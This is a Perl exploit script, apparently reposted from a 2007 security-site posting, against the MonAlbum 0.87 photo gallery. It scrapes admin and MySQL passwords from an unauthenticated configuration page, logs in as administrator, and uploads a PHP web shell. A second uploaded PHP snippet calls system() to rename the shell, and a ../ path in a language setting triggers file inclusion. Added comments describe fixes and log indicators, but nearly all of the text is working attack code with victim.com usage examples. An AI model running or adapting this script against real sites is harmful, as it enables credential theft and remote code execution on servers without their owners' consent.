MonAlbum 0.87 Upload Shell / Password Grabber Exploit
来源:www.vfocus.net 作者:v0l4arrra 发布时间:2007-12-12  
#!/usr/bin/env perl
use strict; use warnings;
###############################################
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Std;

# Script-wide state. %args holds the parsed options; the other scalars are
# filled in by the later phases (credentials, session cookie, server-side
# path, upload file name, upload form action).
my (%args, $user, $password, $sql_host, $sql_user, $sql_password, $cookie, $path, $file, $upload)  = ();
# Name of a scratch file that is later written to the current working
# directory and deleted again at the _EXIT_ label.
my $tmp = 'cmd1.jpg';

# Options -u, -a, -f and -p each take a value (see the table below).
getopts("u:a:f:p:", \%args);
#######################################################################
# -a don't retrieve login and passwords, use from command line instead#
# -u vuln url                                                         #
# -f local php-shell                                                  #
# -p http proxy                                                       #
#######################################################################

# -u is mandatory: without it the usage text is printed and the script stops.
if(!$args{u}) { &usage(); exit(0);}

# -a supplies the admin account as "user:password"; when it is present the
# credential-retrieval request further down is not sent.
if(defined $args{a}){
($user,$password) = split(':',$args{a});
}

# Credential-retrieval phase, used only when -a was not given.
# The script sends a plain GET for /admin/admin_configuration.php with no
# cookie or credentials and with redirects disabled, then reads five form
# fields out of the HTML that comes back. It therefore relies on the target
# returning the populated configuration form to a client that has not logged in.
# Defender notes: the page should check the admin session before emitting any
# output, and stored passwords should never be written into value="" attributes.
# A request for this path that carries no session cookie is a useful log
# indicator.
if(!$args{a}){
my $ua= new LWP::UserAgent;
$ua->agent("Mozilla/5.0");
# Optional HTTP proxy from -p, given as host:port.
if(defined $args{p}){$ua->proxy('http', "http://$args{p}");}
# Do not follow redirects: the first response is the one that gets parsed.
$ua->max_redirect(0);
# Drop one trailing slash from the base URL before paths are appended.
$args{u} =~ s%/$%%i;
my $request = new HTTP::Request( 'GET' => "$args{u}"."/admin/admin_configuration.php");
my $document = $ua->request($request);
# Status line, headers and body as a single string.
my $response = $document->as_string;
# Admin panel login and password, as rendered into the form.
$response =~ m%<input type="text" name="gadm_user" value="(.*?)">%is;
$user = $1;
$response =~ m%<input type="password" name="gadm_pass" value="(.*?)">%is;
$password = $1;
# MySQL host, user and password, as rendered into the form.
$response =~ m%<input type="text" name="gcfgHote" value="(.*?)">%is;
$sql_host = $1;
$response =~ m%<input type="text" name="gcfgUser" value="(.*?)">%is;
$sql_user = $1;
$response =~ m%<input type="password" name="gcfgPass" value="(.*?)">%is;
$sql_password = $1;
print("########################################################################\n");
# Both admin values must be defined; otherwise report failure and stop here.
if(defined $user && defined $password){
print "#Admin Panel: $user\t$password                                         \n";
print("########################################################################\n");
print "#Mysql Details: $sql_host\t$sql_user\t$sql_password                    \n";
}else{
print "#Failed...                                                             #\n";
exit(0);
}
}

# Without -f there is nothing to upload: go straight to the cleanup label.
goto _EXIT_ unless defined $args{f};

# Login phase, using a fresh user agent with the same User-Agent string and
# optional proxy as above.
my $ua= new LWP::UserAgent;
$ua->agent("Mozilla/5.0");
if(defined $args{p}){$ua->proxy('http', "http://$args{p}");}
# Drop one trailing slash from the base URL before paths are appended.
$args{u} =~ s%/$%%i;
# Log in through the ordinary admin form with the recovered or supplied
# credentials. On the server this request looks like a normal administrator
# login, so once the configuration page has been exposed the admin and MySQL
# passwords should be treated as compromised and rotated.
my $request = HTTP::Request::Common::POST(
"$args{u}/admin/login_page.php",
Content_Type => 'application/x-www-form-urlencoded',
Referer => "$args{u}/admin/login_page.php",
Content => [
login_adm => "$user",
pass_adm => "$password",
send => "Enter"
]
);
my $document = $ua->request($request);
my $response = $document->as_string;
# Success is recognised by the JavaScript redirect to ../admin.php in the
# response; anything else is reported as a failed login.
if($response =~ m/document\.location\.replace\(\'\.\.\/admin\.php\'\)/i){
print("########################################################################\n");
print "#Login successfull                                                     #\n";
# Keep the first Set-Cookie value (up to the first ';') as the session cookie.
$response =~ m%Set-Cookie: (.*?);%is;
$cookie = $1;
}else{
print("########################################################################\n");
print "#Login failed                                                          #\n";
goto _EXIT_;
}

# Replay the session cookie on every later request.
$ua->default_headers->push_header('Cookie' => "$cookie");
# Fetch the image-upload page and take the upload form's action attribute
# as the target of the uploads that follow.
$request = new HTTP::Request( 'GET' => "$args{u}"."/admin/admin_ajouter_img.php");
$document = $ua->request($request);
$response = $document->as_string;
$response =~ m%<form ENCTYPE='multipart/form-data'  method='post' action=(.*?)>%i;
$upload = $1;

# First upload: the local file named by -f is posted as the "userfile" field
# of a multipart form.
$request = HTTP::Request::Common::POST(
"$args{u}/admin/$upload",
Content_Type => 'multipart/form-data',
Referer => "$args{u}/admin/admin_ajouter_img.php",
Content => [
MAX_FILE_SIZE => "1000000",
userfile => [$args{f}],
Content_Type => "image/jpeg"
]
);

$document = $ua->request($request);
$response = $document->as_string;
#print $response;

# The response is expected to contain an "is not a valid JPEG file in <b>...</b>"
# message whose bold part is the server-side path of the upload script (sample
# below). This is a path disclosure through an error message shown to the
# client; with error display turned off in production (PHP display_errors)
# this step has nothing to read.
$response =~ m%is not a valid JPEG file in <b>(.*?)<\/b>%i;
#/var/www/web70/html/monalbum/admin/admin_ajouter_img.php
#print $1;
$path = $1;
# Turn the disclosed script path into the presumed image directory:
# strip /admin/admin_ajouter_img.php and append /images.
$path =~ s%/admin/admin_ajouter_img\.php%%i;
$path .= "/images";
#print $path;

# Base name of the -f file (trailing run of word characters, dots and hyphens).
$args{f} =~ m/([\w\.\-]+)$/i;
$file = $1;

# Write the local scratch file: a one-line PHP snippet that calls system() to
# rename the file uploaded above so that it gains a .php extension. It is built
# from $path and $file, i.e. the script assumes the first upload was kept in
# the application's images directory under its original name.
# Defender notes: this depends on an upload handler that keeps a file it has
# just reported as an invalid JPEG, stores it under the web root and preserves
# the client-supplied name - TODO confirm against the MonAlbum source.
# Validating content, generating server-side names and storing uploads where
# scripts are not executed each remove that dependency.
open TEMP,">$tmp" || die "Can't open $tmp: $!\n";
print TEMP "<?php system(\"mv $path/$file $path/$file.php\"); die(); ?>";
close(TEMP);

# Second upload: the scratch file goes up through the same upload form.
$request = HTTP::Request::Common::POST(
"$args{u}/admin/$upload",
Content_Type => 'multipart/form-data',
Referer => "$args{u}/admin/admin_ajouter_img.php",
Content => [
MAX_FILE_SIZE => "1000000",
userfile => [$tmp],
Content_Type => "image/jpeg"
]
);

$document = $ua->request($request);
# Save the configuration with the glangage field set to a ../images/ relative
# path that names the uploaded scratch file. The script evidently expects the
# application to include the file named by that setting, which would run the
# PHP snippet - a local file inclusion; confirm against the MonAlbum source.
# Defender notes: the language value should be chosen from a fixed allow-list
# and anything containing a path separator rejected. Nothing in this script
# restores the previous value, so a saved language setting containing "../"
# is a durable indicator of this sequence, as is a cmd1.jpg in the image
# directory.
$request = HTTP::Request::Common::POST(
"$args{u}/admin/admin_configuration.php",
Content_Type => 'multipart/form-data',
Referer => "$args{u}/admin/admin_configuration.php",
Content => [
glangage => "../images/$tmp",
Save => "Save"
]
);
$document = $ua->request($request);
# Verification: a HEAD request, without following redirects, for the renamed
# file under /images.
$ua->max_redirect(0);
$request = new HTTP::Request( 'HEAD' => "$args{u}/images/$file.php");
$document = $ua->request($request);


# A success status means a .php file is now being served from the image
# directory. Serving that directory with script execution disabled, and
# alerting on .php files created in it, covers this last stage.
if($document->is_success){
print("########################################################################\n");
print "#Shell Uploaded Successfull!                                           #\n";
print "#U may now try: $args{u}/images/$file.php                              \n";
}else{
print("########################################################################\n");
print "#Something went wrong!!!                                               #\n";
}

# Common exit path, reached by falling through or by the goto statements above.
# Only the local scratch file is removed; nothing is removed on the server and
# the changed language setting is left in place. The exit status is 0 whether
# or not the earlier steps succeeded.
_EXIT_:
unlink($tmp);
print("########################################################################\n");
exit(0);

sub usage
{
    # Print the option summary and the author's example invocations.
    # The text contains nothing to interpolate, so a literal here-document
    # produces the same output as the original double-quoted string.
    print(<<'USAGE_TEXT');
###########################################################################
# -a using account from command line                                      #
# -u vuln url                                                             #
# -f local php-shell  (optional)                                          #
# -p http proxy       (optional)                                          #
###########################################################################
# : perl sp.pl -u http://victim.com/monalbum/ -p 75.34.123.215:9629       #
# : perl sp.pl -u http://victim.com/monalbum/ -f shell.jpg                #
# : perl sp.pl -u http://victim.com/monalbum/ -a admin:admin -f shell.jpg #
# this lame script was coded by v0l4arrra                                 #
###########################################################################
USAGE_TEXT
}

 